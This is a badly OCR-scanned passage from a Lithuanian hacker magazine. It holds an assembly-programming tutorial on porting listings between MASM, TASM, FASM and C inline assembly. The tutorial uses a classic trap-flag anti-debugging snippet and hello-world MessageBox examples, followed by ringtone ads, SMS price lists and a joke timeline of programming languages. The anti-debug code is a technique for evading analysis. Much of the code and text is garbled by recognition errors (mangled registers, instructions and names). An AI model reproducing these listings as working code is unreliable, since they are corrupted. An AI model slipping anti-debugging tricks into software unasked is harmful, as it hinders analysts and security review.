StackLocation) byloja apie tai, kad šis kodas — tai tvarkyklė (arba 
jos fragmentas), visiškai nepritaikyta darbui taikomajame režime. 
Jeigu listinge neiškviečiamos jokios API funkcijos ar pertraukimai, 
nėra privilegijuotų instrukcijų ir nesikreipiama į atmintį absoliučiais 
adresais (tokiais, kaip mov eax,fs:/20h|), tai šis kodas gali veikti bet 
kurioje 32 bitų operacinėje sistemoje. 

64 bitų x86-64 režimą galima atpažinti pagal naudojamus registrus 
RAX/RDX/RCX. Savaime suprantama, toks kodas nesuderinamas 
su 32 bitų transliatoriais. 

*nix sistemoms skirtą kodą galima atpažinti pagal joms būdingą 
ATAT sintaksę. Biblioteką libc naudojančios programos gali būti 
lengvai perkeltos į Windows, kadangi libc — tai standartinė C bib- 
lioteka, tačiau kai kurios *nix funkcijos nėra įdiegtos jos Windows 
versijoje. Kitaip tariant, čia nėra fork iškvietimo, kuris procesą 
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padalina į du. Daugeliu atvejų perkėlimas vis tik įmanomas. Tai 
ypatingai pasakytina apie matematines funkcijas, kurios abstrahuo- 
tos nuo sisteminio pasaulio. Programos, kurios veikia apeidamos 
libc per INT 80h/call 0007h:00000000h sąsają (visokie virusai ir 
kirminai), praktiškai neperkeliamos. 

Nustatyti transliatorių kiek sudėtingiau. TASM'o požymiai yra 
bylos pradžioje naudojamos direktyvos „jumps“ ir „Iocals“. FASM 
paprastai galima atpažinti pagal direktyvą „format“ (pavyzdžiui, „for- 
mat PE GUI 4.0“), kas, beje, nėra visai patikima, ir pagal chronišką 
raktinio žodžio offset nebuvimą. MASM'ui lieka visa kita. 


ĮAsemblerinių intarpų metodas] Vietoje kovinio pavyzdžio 
aptarsime klasikinį antiderinimo kodą, kuri galima rasti daugelyje 
straipsnių ir knygų: 


; ūpibrėšime savo struktūrinių 

; išimčių apdorotojo 

push olfset my she 

; Išsaugojame seną apdorotuva 
push dword pir fs:[0] 

; Tegistruojame naują apdorotuvą 
mov fs:[0],esp 


pushf ; į steką sukišame vėliavėlės 
; aktyvuojome trasavimo bita 

or dword ptr[esp],100h 

; atnaujinta bitą išstumiame į vėliavėlių 
; Tegistrą, taip priversdami CPU su 

; kiekviena komanda aktyvvoti išimtį 
popl 


XOI 60X,00X 
; be derintuvo po xor aktyvuojama išimtis 
; It valdymas perduodamos my seh, 0 

; EAX registre bus nenulis 


+ su derintuvu išimtis: tyliai „svėdamo“ 
my. seh: 

les! 60X,e0X 

; Jeigu derintuvo nėra, toi e0x 1= O 
įnz debugger is present 


Kaip sukompiliuoti šį koda? Kažkaip jis nelabai panašus į 
savarankišką programą... Gal pabandykime šį kodą modifikuoti taip, 
kad jį būtų galima panaudoti kaip asemblerinį intarpą. Daugelyje 
C kompiliatorių jis apiforminamas kaip „ asm(...asemblerinis 
kodas...)“, tačiau tiesiogiai įgyvendinti šio sumanymo nepavyks! 
Juk mūsų asemblerinis listingas, kaip ir daugelis kitų iš vaizdžių 
agitacinių mokymo priemonių ištrauktų demonstracinių programų, 
yra kažkas viduryje tarp pseudokodo ir veikiančios programos. 
Visų pirma, žymė debugger is present nėra apibrėžta ir čia įterpta 
siekiant vaizdumo; antra, mes jau apibrėžėme struktūrinių išimčių 
apdorotuvą, aktyvavome trasavimo vėliavėlę, tačiau pamiršome 
apie tai, kad po atlikto derintuvo patikrinimo viska reikia grąžinti į 
savo vietas! Taigi prieš naudojimą listingą reikia šiek tiek papildyti, 
pavyzdžiui, taip: 


Užbaigta programa anti debug.c 
main() 


63) 
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Anti-debug.exe derintuve 


m a 
osm 
// asemblerinis intarpas 
push oflset my seh 
push dword pir (s:[0] 
mov (5:[0],esp 
push 
or dword plrfesp],100h ;sal tap Aog 
popl 


pradžia 


X01 60X,00X 

my seh: 
; Gtslalome seną apdorotuvą 
pop. dword pir. Is:[0] 


odd 6sp A 


; tazultatą gražiname  kintamajame 0 
(MOV 0,60x 
; osemblerinis: intarpas -— pabaiga 


1 patiktiname kintamoji a, ar jis lygus nuliui 
printf(,PosWn“,0? „no dehugger“ : „under debugger“); 


1 
> 


Be abejo, tai ne pats geriausias variantas. Įeidami į struktūrinių 
išimčių apdorotuva mes turime iš jo išeiti per nedokumentuotą API 
funkciją Continue, nors... viskas veiks ir taip. Geriau susikoncen- 
truokime ties asemblerinio intarpo apiforminimu. 

Mes pašalinome „jnz debugger is present“ ir vietoje jo grąžiname 
reikšmę per iš anksto apibrėžtą kintamąjį „a“. Programą kompiliuo- 
Jame įprastai („cl.exe anti-debug.c“) ir bandome ją paleisti. Prasu- 
kus programą per Soft/CE, OllyDbg arba bet kuri kitą neemuliuojantį 
derintuvą, ekrane pasirodys under debugger arba no debugger. Tai 
reiškia, kad transliavimas pavyko! 


O šiai kitos klasikinis pavyzdys: 


code; kodo sekcijo 
start: |; dėjimo taškas 
push 0; ulype 
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push 0; IpCamtion 
push olfset -s0 ; Iplexi 
push 0; hWnd 


call MessageBoxA 


; išeiname nuspaudus OK 
'al 
data |; duomenų sekcija 


; eilutė, kuria mes išvedinėsime 
s0 db „hello, world“,ODh,OAh,0 


end start 


Mėginimas programos tekstą įterpti kaip asemblerinį intarpą nieko gero 
neduoda. Kompiliatorius mus juodai keikia ir atsisako kompiliuotis. 
Tenka veikti strategiškai, t.y. nuožmiai ir radikaliai. Kartu su nereika- 
linga instrukcija „ret“ pašaliname direktyvas „code ir „data (originalioje 
versijoje instrukcija „ret“ užbaigia programa, kadangi paleidus PE bylą 
steko viršūnėje yra užbaigiančios procedūros adresas, tačiau mūsų 
asemblerinio intarpo steko freime nėra nieko panašaus). 

Iš esmės start žymės galima ir nepašalinti, o štai su sO teks susidoroti. 
Na, nepripažįsta įmontuotas asembleris „db“ direktyvos ir nieko čia 
nepadarysi! Tenka eilutę-konstanta apibrėžti panaudojant pačios C 
priemones. Ji gali būti išsaugota tiek steke (kaip lokalus kintamasis), 
tiek ir duomenų sekcijoje (kaip globalus kintamasis). Iš tikrųjų eilutės 
visada saugomos duomenų sekcijoje, o į steką įkeliama tik jų kopija, 
tačiau kopija — tai pridėtinės niekam nereikalingos sanaudos. Jeigu 
kintamasis apibrėžtas kaip globalus, tai raktinis žodis offset išsaugo 
savo galią ir kompiliatorius nesikeikia, Su lokaliais kintamaisiais viskas 
kur kas sudėtingiau. Šiuo atveju konstrukciją „push offset sO“ kom- 
piliatorius transliuoja į „push offset [ebp +x]“, kas sintaksės požiūriu 
visiškai beprasmiška! Tačiau pašalinti offset negalima, kadangi „push 
Įebp-+x]“ į steką įkelia toli gražu ne rodyklę į sO, 0... pirmų keturių 
baitų reikšmes, t.y. elgiasi kaip „*((DWORD*)sO)“. Teisingas variantas 
atrodo taip: „Iea eax,s0/push eax“ (savaime suprantama, vietoje eax 
galima naudoti bet kokį kitą bendros paskirties registrą). 

Dar vienas niuansas. Konstrukcija „call MessageBoxA“ vykdoma 
visiškai ne taip, kaip buvo planuota, kadangi vietoje MessągeBoxA 
klastingasis kompiliatorius pateikia toli gražu ne pačios Mes- 
sageBoxA adresą, 0 rodyklę į dvigubą žodį, kuriame saugomas 
MessageBoxA adresas! Iš to išplaukia, jog norint, kad programa 
nesusprogtų ir nenumirtų, būtina panaudoti prefiksą ds, tada 
iškviečiantis kodas atrodys taip: „call ds:MessageBoxA“. 
Apibendrinę visas aukščiau išsakytas mintis mes gauname tokią 
programą. Net dvi! Su eilutės apibrėžimu kaip globalaus ir kaip 
lokalaus kintamojo: 


Asemblerinių kintamųjų „globalizacija“ 
Aindude < windows.h > 


// globalus kintamasis, kuri mes išvedinėsime į ekrana 
char s0[]— "hello, world“; 


moin() 


asm 


push 0 
push (O 
push offset s0 
push 0 


: pridedame ds; 
call ds:MessageBoxA 
) 


Kompiliuojam: 
cLexe hello global.c USER32.lib 


Čia USER32.lib — MessageBo/A skirtos bibliotekos pavadinimas. 
Tada paleidžiam. Gauname simpatišką dialogo langą. 
Variantas su lokaliu kintamuoju kompiliuojasi ir pasileidžia lygiai 
taip pat, kaip ir ankstesnysis: 

Asemblerinių kintamųjų „lokalizacija“ 
žindude <windows.h > 
main() 


char s0[]- "hello worlAn“; 


os 

push 0 

push 0 

led e0x, s0 

push e0x 

push 0 

call ds:MessageBoxA 
J 


Asembleriniai intarpai — patogus dalykas, tačiau jis vis dėlto 
turi tam tikrų apribojimų. Kitaip tariant, įmontuotas asembleris 
nepripažista jokių makropriemonių, todėl jeigu transliuojamoje 
programoje yra daug makrosų, tai be MASM'o (arba jo konkurentų) 
čia jau neapsieisi. 


[MASM, TASM ir FASM] Manysime, jog mes pakankamai subren- 
dome visos programos asembliavimui. Atrodytų, kas čia sudėtingo? 
Imk ir transliuok. Deja, ne! Štai dar vienas klasikinis pavyzdys, 
kurį aš radau pasaulinio voratinklio platybėse ir kuris jo kūrėjo 
sumanymu turėtų išvesti „hello,world!“: 
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extem  ExitProcess:PROC 
oxtern MessageBoxA:PROC 


„data 
s0 db "hello, world',0 
code 
slarl: 
push 0 
push 0) 
push ollset s0 
push 0 
call MessageBoxA 
push 0 
call ExilProcess 
end stori 


Atrodytų, kas čia sudėtingo? Imk ir transliuok... 


Programą transliuojame su MASM'u, kurio paskutinę versiją galima 
pasiskolinti iš NTDDK: 


ml /c /colt hello.asm 


kur /c — raktas, reiškiantis „tik asembliuoti, o ne linkinti“ (linkinimo 
mes imsimės atskirai ir kiek vėliau), /coff -— transliuoti i coff bylą (pagal 
nutylėjimą sukuriama omf byla, su kuria moka dirbti retas linkeris). Na, 
o hello.asm — tai mūsų bylos pavadinimas. MASM keikiasi: „waming 
A4022: with /coff switch, leading underscore reguired for start address: 
start“, tačiau lyg ir asembliuoja. Pala, tačiau pas mus juk yra žymė 
start, kuri naudojama kaip startinis adresas! Ko gį reikia transliatoriui?! 
Išsigimęs „Microsoft“! MASM nori gauti „start“ (su pabraukimu), o pas 
mus pabraukimo nėra! Išvada: start pakeisti į start arba atminties mod- 
elyje nurodyti kitą iškvietimų tipą — „stdcall“. Dabar programa asem- 
bliuojasi sklandžiai, todėl ateina laikas ją linkinti. Tai daroma taip: 


link /SUBSYSTEMAWINDOWS hello obį KERNEL32.LIB USER32.lib 


kur SUBSYSTEM -— už posistemės parinkimą atsakingas raktas 
(šiuo atveju tai yra WINDOWS, tačiau taip pat yra konsolinėms 
programoms skirtas CONSOLE ir tvarkyklėms skirtas NATIVE), 
hello.obj — linkinamos bylos pavadinimas, KERNEL32.LIB 
ir USER32.LIB — kartu su Platform SDK pateikiamų būtinų 
bibliotekų pavadinimai. Jeigu SDK neturi, tai ms link linkeris 
jas gali sugeneruoti savarankiškai, jam tereikia nurodyti raktą 
/IMPLIB:KERNEL32.DLL. 


386 hello2.obį : error LNK2001: unresolvad external symbol EsitProcess 

model Ilat hello2.obį : error LNK2001: unresolved external symbol MessogeBoxA 

00004940: 40 31 32 00-5F 45 6E 75-60 50 72 6F-70 73 45 78 012 EnumPropsEx 
00004950: 57 40 31 32-00 5F 5F 69-60 70 5F 5F-45 6E 75 60 WA12  imp Enum 
00004960: 50 72 6F 70-73 45 78 57-40 31 32 00-88 Aš GS IE PropstxVAli? KES 
00004970: EE Al i GSM Ga UE AA Gl 65 MI-5: St 69 GD im 
00004980: 70 5F SF 40-65 73 73 61-67 65 42 6F-78 41 40 31 p MessageBoxAA1 
00004990: 36 00 5F 4D-65 73 73 61-67 65 42 6F-78 57 40 31 6 MessageBoxHA1 


Lkrasis MessageBoxA veidas 


65) 


[HAKERIS 08 [39] 06 


66) 


[HAKERIS 408 [39] 06 


hello2.exe : fatol error LNK1120: 2 unresolved externals 


Še tau kad nori! Linkeris negali surasti funkcijos! Kodėl? Žvilgtelėjus 
Į USER32.lib su hex redaktoriumi mes matome, kad MessageBoxA 
ten pridėtas kaip MessageBoxA(016, kur — stdcall iškvietimo 
požymis, 0 (016 — visų funkcijos argumentų dydis baitais. Atitinka- 
mai ExitProcess iškviečiamas kaip ExitProcess(04, kadangi čia 
perduodamas viso labo vienas argumentas, 0 32 bitų režime jie 
visi Užima du žodžius. 

Vis tiek nieko nesuprantu! Juk mes jau pasakėme, kad atminties 
modelis — stdcall, po ko transliatorius prie visų funkcijų klusniai 
pridėjo pabraukimo ženklą. Tačiau paaiškėjo, kad jis pamiršo ar- 
gumentus. O kaip jis juos galėtų papildyti? Juk funkcijos prototipas 
apibrėžtas kaip ROC! Še tau kad nori, asembleris pasikuklino 
užsiimti saviveikla! 

Komplekte su pilna MASM versija pateikiamos inc bylos, ku- 
riose visi prototipai apibrėžti teisingai, tačiau DDK nėra nieko 
panašaus, todėl šį darbą mums teks atlikti savarankiškai ir rašyti 
šitaip: extern MessageBoxA(016:near arba taip: extern imp 
MessageBoxA(016:dword. Pastaruoju atveju funkcija bus iškviesta 
per perjungiklį. Jeigu atminties modelyje nenurodytas žodis stdcall 
ir atitinkamai transliatorius neprideda pabraukimo ženklų, abi 
konstrukcijos atrodytų taip: extern MessageBoxA(d16:near ir 
extern imp MessageBoxA(016:dword. Kad kiekvieną kartą 
nereikėtų iškvietinėti ilgo pavadinimo, sukurk trumpa aljasą, kurį 
gali pavadinti tiek msgbox, tiek mb, nors, siekdami išvengti paini- 
avos, programuotojai vis dėlto išsaugo originalius API pavadinimus 
ir pašalinta tik „“ bei „$x“. 

Užbaigtas programos variantas atrodo taip: 


386 
„mode! (lat 


atei ExitProcess(024:near 
aten MessogeBoxA(O?1 6:near 


„data 
s0 db hello, world',0 


„code 
stort 
push (0 
push (0) 
push offset s0 
push 0 
call MessageBoxA(o>16 


push 0 
call | ExitProcess()4 
end start 


Dabar programa normaliai transliuojasi ir net veikia, tačiau 
vis tiek liko neatsakytas vienas klausimas: kodėl jos kūrėjas 
iš anksto neatliko visų šių veiksmų?! Ogi todėl, kad programa 
skirta TASM'ui, kurios bibliotekose funkcijos vadinamos taip, 
kaip parašyta, o ne taip, kaip diktuoja susitarimas apie std- 
call iškvietimus. Tuomet kodėl gi programos netransliavus su 
TASM'u?! Tam yra priežasčių. Visų pirma, TASM yra užmestas ir 
Jau nebetobulinamas produktas (beje, MASM taip pat nebeto- 
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bulinamas). Antra, TASM sugeneruotas objektinės bylas sunku 
integruoti į kitus projektus. Tačiau jeigu kam nors patinka TASM, 
tai programą galima kompiliuoti taip: 


rem asembliuojame 
tosm32 /ml h2.asm 


tom iš dll poruošiame bibliotekas 
implib —c user32.lib CAWINNTSsystem3 2user32.dll 
implib —c kemel32.lib CAWINNTsystem32kernel32.dll 


rem linkiname 
tlink32 h2.obį -Tpe od L user32.lib L kernel32.lib 


O ar negalima būtų mūsų programos asembliuoti su nuostabiu 
(ir tuo pačiu visiškai nemokamu) transliatoriumi FASM? Deja! 
FASK sintaksės skirtumai labai dideli, todėl be kapitalinio 
listingo pataisymo čia neapsieitume. Pateiksiu pavyzdį. Plačiai 
paplitusi konstrukcija DB 669h DUP(?) priverčia FASM sumišti 
ir ją tenka pakeisti į rb 669h, kas, be jokios abejonės, trum- 
piau, tačiau vis tiek kiek perkeliant tenka padaryti papildomo 
darbo! Mes jau minėjome o/fset nebuvimą. Įprastinių direktyvų 
taip pat nėra. Makropriemonės yra, tačiau toli gražu ne tokios, 
kaip MASM'e, ir veikia jos visiškai ne taip! 

Pritaikius programą FASM'ui, ji atrodo štai taip: 


include "INCLUDEwin32ax.inc" 


„code 
start: 
push 0 
push 0 
push s0 
push 0 
call [MessageBox] 


push 0 
call [ExitProcoss] 


data 
s0 db "hello, world',0 


„end start 


Kaip matai, dingo direktyvos .386 ir „model, o raktinio žodėlio 
„end pradžioje atsirado taškas, kurio anksčiau čia nebuvo. Pri- 
jungiamoje byloje „win32ax.inc“ yra visi reikalingi apibrėžimai, 
todėl API funkcijos iškviečiamos su tarp laužtinių skliaustų 
įrašytais savo vardais (netiesioginis iškvietimas pagal nuorodą, 
jeigu darysi kitaip — viskas baigsis nesėkme). Iš instrukcijos 
push sO dingo raktinis žodis offset. Ko gero, tai viskas. Dabar 
transliatorius sėkmingai suvartoja programą ir nepaspringsta: 
fasm hello.asm. O mums savo ruožtu belieka paleisti sukurtą 
exe bylą ir pasidžiaugti tuo, kaip gerai ji veikia. 


Manysime, jog mes pakankamai subrendome visos programos 
asembliavimui. 


NAUJOS TOP 5 kodas 


UT United / We Are The Winners winners 
Mary J. Bildge Ieat. U2 J onemary 


a IT 2 E! Tikro garso melodijos 


world 


TOP 5 ORIGINALIOS ko 


Arash / Boro, Boro bl 0 ATB / 9 PM -Tili I Come 9pmtilki 
Jadiy Yankee / Gasolina gasolina Rammstein / Amerika ameri 
When I'm Gone whenimgonė Metallica / Enter Sandman entersan 


1 Djs Vs. Roxette / Fadina Like A Flowa Tad Jų 1 ai volve Rasmus / First Day Of My Life firstd 
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Lenny Kravitz / Fly Away tyaway | Misškiaskdkės ) bala Eros Ramazoti ta co80001avų ions / ' 
y y Away yaway Prodigy Vond 5 p 0 Bob Sinclair / Love G Scorpi ns Wind Of Change windo 
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Britney Spears / Everytime everyt EN Card ė r Prodigy / Voodoo voodoo 
Avril Lavigne / Nobody's nobodyshom A t / Just A Lil Bit istai AU V . tai “ Nightwish / Nemo nemo 
Black Eyed Peas / Let's Get It Started letsgetits OL Dhany / Every Single Day avar “ == š trippinghi The Rasmus / In The Shadows inthesha 


Jessica Simpson / These Boots Are thesebootsht Touch And Go / Would You, wouldyou 


21 " k nna / Hung Up hungupht į į 5 Of A Butiarfly wingsolė 
ai As aa "—— E Iropo / The Final Countdown finaicou 0z dot k pa TIKRO GARSO KOVERIAI 


U. / All About U allabouti i 
Ali About U allaboL Madonna / Sorry SOrTy 


Guno Apės LB 0 lords Bora unk MŪ'S / Freestyler treestyler 5 / Saxbomi . 
50 Cent feat. Olivia / Candy Shop upė Black Eyed Peas / My Humps nyhumpsht 2 Mode / Prac = i suk sių mytumps 
2 ie Pussy olis ha 


TV / Mission Impossible mission 0 Cent / Window Stu A 
. Window St Cascada / Everytime We Touch 


System Of A Down / Hypnotize hypnotize srega / Chemy Bumar cnerny The Pussycat Dolls / Don't Che dontch y 
Serega / Cherny Bumer chamy ž You're -Eo8U ful ourc TAU, / Al About US antis 


Arash / Temptations tompia "a a omia hotelc it Robert Mijas / Chišdr kdror ti > "e t m en “ 
Dima Bilan / Never Let You Go neve PINO ER90 UNO holimi anlila Ninja / Dangerzone danger ugababes / Push The Bu pus 


ww 


Žaidimai telefonams 


Nie NN 
Madagascar 
= Going Wild 


Mission 
Impossible III 


Siųsk sms 


Spalvoti paveiksliukai S 2 Animacijos 


Rašyk SMS: EXEI KODAS, siųsk numeriu 1321 | 3 - Rašyk SMS: EXEANI KODAS, siųsk numeriu 1328 
Kaina 2 Lt. Pvz.: exei car | k Kaina 3 Lt. Pvz.: exeani shell 


Nusiųsk draugui: EXEI KODAS 370XXXXXXX El Gia FXE ioodus VEI too 87 Nusiųsk draugui: EXEANI KODAS 37OXXXXXXX 


BXEANI Gciphin | DXEANI Inarbės 


EENNI Gragon EXEANI 104470. DXEANI axotic=—=— EXEANI bower 


os E 


24 : 
-—- 


E 


BDYEANI mushynom EEK paovenaiby EXEANI makšives | EXEANI ruda51 | EXEAMI gm 
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D0 Metų programavimo kelionė 


1955 


1979 
Fortran Modula 2 
FORmule TRANslator — formulių vertėjas. Senesni pro- N.Virtas su paskaliu nenurimo. Jam to maža. 
gramuotojai jam iki šiol meldžiasi. 1980 
1958 Ada 
Algol Specialiai kariškiams skirta kalba. 
Džonas Bakusas pats neišsiduoda: ALGOrthmic Lan- 1985 
guage — jis turi talentą kurti pavadinimus. C++ 
1958 Bjarnas Straustrupas, nepaisydamas savo paukštį primenančios 
Lisp 


pavardės, įsigudrino sukurti išskirtinai normalų daiktą. Tiek 
eksploitų — tik spėk suktis. 
1987 
Perl 
Sukūrė Laris Volas. Peikti negaliu, tačiau dėl realizacijoje paliktų 
skylių susikūrė nemažai hack grupių. 


Sąrašai, sąrašai — mums visiems patinka sąrašai... 
Sakoma, jog su ŠITUO veikia emacs. Kultūrinis šokas. 
1960 
Cobol 
Vėl puikus pavadinimas: Common Business Oriented 
Language — universali į verslą orientuota kalba. 


1987 
1964 Oberon 
PL1 Niklausas nerimsta. 
Su šia kalba dar programavo mano mama. 1991 
1970 Python 
Pascal 


Beje, kalba pavadinta mano mėgstamo šou „Monty Python“ 


Pirmasis Niklauso Virto kūrinys. Kalbos pavadinimas garbei. Ir gyvatės čia niekuo dėtos. 


normalus, o Virto vardas — super. 


1992 
1972 Oberon-2 
Prolog Nėra žodžių... vien tik emocijos. 
Programavimo kalbų kūrėjai laikosi tradicijų: PROgram- 1993 
ming LOGic. Delphi 
1972 TurboPascal mutavo į Delphi. Pagarba kompanijai „Borland“. 
Cc 1995 
Denisas Ričis pasistengė. PHP 
1975 Rasmusas Lerdorfas iš pradžių nė nemanė kurti jokių pro- 
Basic 


gramavimo kalbų — tiesiog nusprendė paskaičiuoti, kiek žmonių 


Basic Beginner's All-purpose Symbolic Instruction Code skaito jo reziumė. Naudojo Perl. 


- universalus simbolinių instrukcijų kodas pradedan- 


1995 
tiesiems. Kliedesiai. Java 
1976 Kavos virimo aparatams ir kavos mėgėjams skirta kalba. 
Forth 1999 
Šiaip jau Čarlzas Mūras planavo ją pavadinti Fourth, Cž 


tačiau šis nuostabus pavadinimas netilpo į tuometinių 


“Delphi „Microsoft“ gerbėjams“. Beje, labai patogus dalykėlis. 
ESM 5-ių simbolių rėmus. Gavosi Forth. 


Pateikus ELITE CLUB 
kortelę visose BMS 


5 96 nuolaida. 


Kaunas, Savanorių pr. 255, 
(HYPER MAXIMA) 


parduotuvėse suteikiama 


BT- Geras.com 


Elitinio 


HAKERIŲ KLUBO. 


nariams taikomos 3 


ELITE CB 
*00458915b 


GOLDEN MEMBEK 


pees 04/06 


END 


Interneto klube „IMPRESS“ 
su ELITE CLUB nario kortele 
suteikiama 20 9 nuolaida! 


ZL lida 


HAKERIŲ KLUBAS 


BMS MEGAPOLIS, 

Laisvės pr. 2 

Tel.: (5) 24 77 300 

El. paštas: v.megapolis0Obms.lt 


Savanorių pr. 66 
Tel.: (37) 75 10 10 
El. paštas: kaunas(Obms.lt 


BMS MEGAPOLIS, 

Savanorių pr.301 

Tel.: (37) 313101 

El. paštas: megapolis(Obms.lt 


Minijos g. 2 
Tel.: (46) 38 33 33 
El. paštas: klaipeda(Obms.lt 
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ANICTA NI | 
AINAEIA N f. 3 9 


Vardas Kitame numeryje norėčiau rasti: Naudojiesi kompiuteriu 
Pavardė = a metus 
Amžius a Naudojiesi internetu 
Al 
Adresas a + metus 
Kiek žurnalo numerių skaitei? 
B +! numerius 
x : Kokią OS naudoji? 
El.paštas a 
Tavo klausimas į FAG): 
Išvardink tris, tavo manymu, 
įdomiausius šio numerio straipsnius: 38-0J0 NUMERIO 
2 NUGALĖTOJAS: 
VIKTORAS PARTAUSKAS 
IŠ PALANGOS. 
ž ' JAM ATITENKA 
ir tris prasčiausius: MICROSOFT WIRELESS 
a OPTICAL KLAVIATŪRA IR PELĖ 


LAIMĖTOJO PRAŠOM 
PASKAMBINTI Į REDAKCIJĄ IR 
SUSITARTI DĖL PRIZO 


m p.d. 2234, LT -44012, KAUNAS - C 
ATSIĖMIMO. 


LT CG 


Pentium D 


inside 


BERKANTIKOMPIUTERI[SU DIRPROGESORIUM! 


54 cm 4 


VISIŠKAI 
PLOKŠČIAS 


Dviejų branduolių procesorius: 
NTEL4P PENTIUMOO D 805 2.66+ 2086 1 
Kietasis diskas: 160Gb SATA II / 8mi 
Atmintinė: 512MB DOR400 "di 
Optinis įrenginys: DVD +- RW Double layer 

Vaizdo plokštė: Geforce 6200 256 MB DVI 
1 Garso plokštė. * alies Žž 


Interneto plokštė: Intei 10/100/101 

Kontrolė aid 0.1, TV išėjimas 

Foto kortelių skaitytuvas 
Garantija: 24 mėn - 


Kaina 1999 Lt - 334 = 


L, INTEL LOGO, INTEL INSIDE, INTEL INSIDE LOGO, INTEL PENTI CENTRINO LOGO, CELERO 
DEMARKS OR REGISTERED TRADEMARKS OF INTEL COR! IES IN THE UNITE! 
a 


L 
o 


4 Dima Bilan * Never Let You Go 2184 


218458 


Vilija * Mylėk 206288 
A. Rimiškis * Kartais būna 214389 
21846 
j j 2163 


A.J.M.S - specialios misijos "= X ' Raketa * Dolce Gabana 21634 


Rašyk SMS: HA JAVA 65478 Flipsyde * Happy Birthda 201844 
Siųsk numeriu: 1354 10Lt Mihai Traistariu * Tornero 216206 
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2650, 3100, 3200, 3220, 3300, 3650, 3660, 5100, 5140, 6020, 
6100, 6170, 6200, 6220, 6230, 6260, 6600, 6610. 66101, 6630, 
6680, 6800. 6820, 7200, 7210, 7250, 72504, 7260, 7610, 
7650. N-G Sharp: GX30, TO-GX1, TO-GX20. Siemens: 
65, 0465, CX70, M63, 565, 5X1, Sony Ericsson: F500, K500i, 
K6001, KGO8, K700, K7S04, VB00, WS504, W800, WB00l, WB 101, 
Z1010 Za00 


TEKSTAI . pa 2006 FIFA World Cup * Goleo 221326 
— 


Beyonce * Deja Vu 221835 
Justin Timberlake * Sexy Back 221832 
Bumer 2 * Osen 221626 
219247 
Rihanna * SOS 209851 
R.H.C.P. * Dani California 218933 
Nelly Furtado * Maneater 218637 


Padėk Asteriksui išgelbėti Obeliksą 


Rašyk SMS: HA JAVA 194513 
Siųsk numeriu: 1354 10Lt 


Motorola: C650, E1000, E308, V180, V220. V3 Razr. V500, 
V524, V600. Nokia: 2650, 2100, 2120, 3200, 3220, 3230, 3300, 
25104, 3650, 3660, 5100, 5140, 6100, 6200, 6220, 6230, 62301, 
6260, 6600. 6610, 66104, 6630, 6670, 6800, 6820, 7200, 7210, 
7250, 72504, 7260, 7610, 7650, 8800, 8801, 8910i, N-Gage. 
Karo Ds00, £700, E710, E730, Z107, 2500, Siemens: 
CX65, 565. Sony Ericisor: F500, 13004, K300, K300L, K500L 
*5068 K700 K7504 7610, 7630, V800. W5504, W800, Wa00L 
Ws10 21010. 2600 


55593 45676 


TFE 


"A 
41319 41314 


WA 


Shakira/W.Jean * Hips Don't Lie | 213723 
Eminem/Nate Dogg * Shake That | 201846 


ža "g 


Gnarls Barkley * Crazy 211667 
E ban "2 B ę m Į 50 Cent and G-Unit * If I Cant 37057 
Leisk laiką su Bejeweled žaidimu L : 4 LT 219363 


Rašyk SMS: HA JAVA 141452 
Siųsk numeriu: 1354 10Lt 


Motorola: C650. E1000, V180. V220, VI Razr, V500, V525, 
r 3100, 3120, 


Tyla [kai ko nors nenori girdėti 57532 
Bob Sinclar * World, Hold On 214526 


L 7250. Samsung: 
Oso0, Ea80, E700, £730, 510, X460, Ž300, Z500 Siemens: 


Mė5, MC60, 555, 565, 555, SL56. 
Sony Eriksson: F500. KI00, K3001. KSOG1, kSOBL, KGO04, KGOBi, 
K206, KT504, 7004. 1610, 7630. V800, W550i, WB00, WBO0L, 
Waiū 21010 7600. 


Black Eyed Peas * My Humps 188552 
Mino * Saulėtam pajūry 209486 
A. Rimiškis * O kam sava 209482 
- . Vudis * Pabėgai 206291 
Sprogdink viską kas juda! m»: - Biplan * Sok ir nesustok 173759 
Rašyk SMS: HA JAVA 57626 Ž "r 4 p M. Mikutavičius * Laikas būti pir...J 218216 
Siųsk numeriu: 1354 Raketa * Planas Chuliganas 216343 
Sel ft. Mia * Muzika 211815 


Motorola: C650, Vi Razi 


S 
Šš 
š 
š 
ž 
ž 


5 3 
pe žų Mino ir Vilija * Vivo per lei 188099 
/ 20. 1 CX65, 0, oi * 
4 k Ž a j vagis 69 Danguje * Vasara 162209 


Take That * Back For Good 208729 


1 Sex Pistols * Anarchy In The UK 206151 


Rašyk SMS: 


Kaas araaag Naconna „Puni „P UE 
Siųsk numeriu: 1352 2Lt AC/DC * Back In Black 12073 


Naujieji Lietuviai * Afigenai 173767 
Boney M * Daddy Cool 21321 
Oueen * We will rock you 25005 
James Blunt * You're Beautiful 173731 
Depeche Mode * Precious 173687 
Prodigy * Voodoo People 38570 


Rašyk SMS: HA WALL kodas 
pvz.: HA SUPER 114363 Siųsk numeriu: 
Siųsk draugui: HA SUPER kodas 3706XXXXXXX 


Nokia: visiems naujiems modeliams. Motorola: C650, V180, V220, V300, V500, V525, 
V550, V600. Samsung: C100, C100, E700, E710, P400, P510, E800, E810, X450, X100, 
Z100, SGH-Z107. Siemens; C60, C62, C62, M55, MC60, 555, SL55, ST55, S160, SXI, 


Sony Ericsson: KS004, K700, P800, P900, PS10, T230, 1300, 1310, 7610, 7630, Z200. 
Pilnas sąrašas - wyww.inpoc.lt 
- 


Tik NOKIA tei 4 lefonams | +“ 1 | į 
Rašyk žinutę: HA L TUSCIAS LiL 


Bi POLI melodija - rašyk SMS: HA SUPER kodas 
pvz.: HA SUPER 219363 Siųsk numeriu: 
A Siųsk draugui: HA SUPER kodas 3706XXXXXXX 


Mono melodija: HA M kodas 


Rašyk SMS: HA SAPNAS sapno reikšmė 
Pvz.: HA SAPNAS medis 
Siųsk numeriu: 1352 


2Lt 


Polifoninės melodijos tinka: Nokia: visiems naujiems telefonams, Samsung: D500, E700, E710, 
P400, P510, 5300M. SGH-£330, E800, E810, X450, X460, 1100, V200, X100. Siemens: A60, C55 
C60, C62, CF62, CV65, CX65, CX70, M55, M65, MC60, 555, 565, SK65, SLS5, SL65, ST60, 5x!, 

Sony Ericsson: K500i, K700, K750, WR00i, P800, P300, PS10, 57001, T2. 
7610, 7630, V800, 21010, 2200, Mono melodijos tinka: Nokia, visiems Naujos I 
Pilnas sąrašas - www.npocJt 


ISMSLteroras) 


Siųsk numeriu: 1352 2Lt 
Kodas: SEXY - žinutės, kurios tikrai privers pasijusti SEXY! 
Kodas: ORGAZMAS - Ahh... Ohhh... Užsmaigstys Ir nejautriausius!!! 


Kodas: PATINKI - Jeigu tau kažkas labai patinka, Išsiųsk! 


4 E nai 
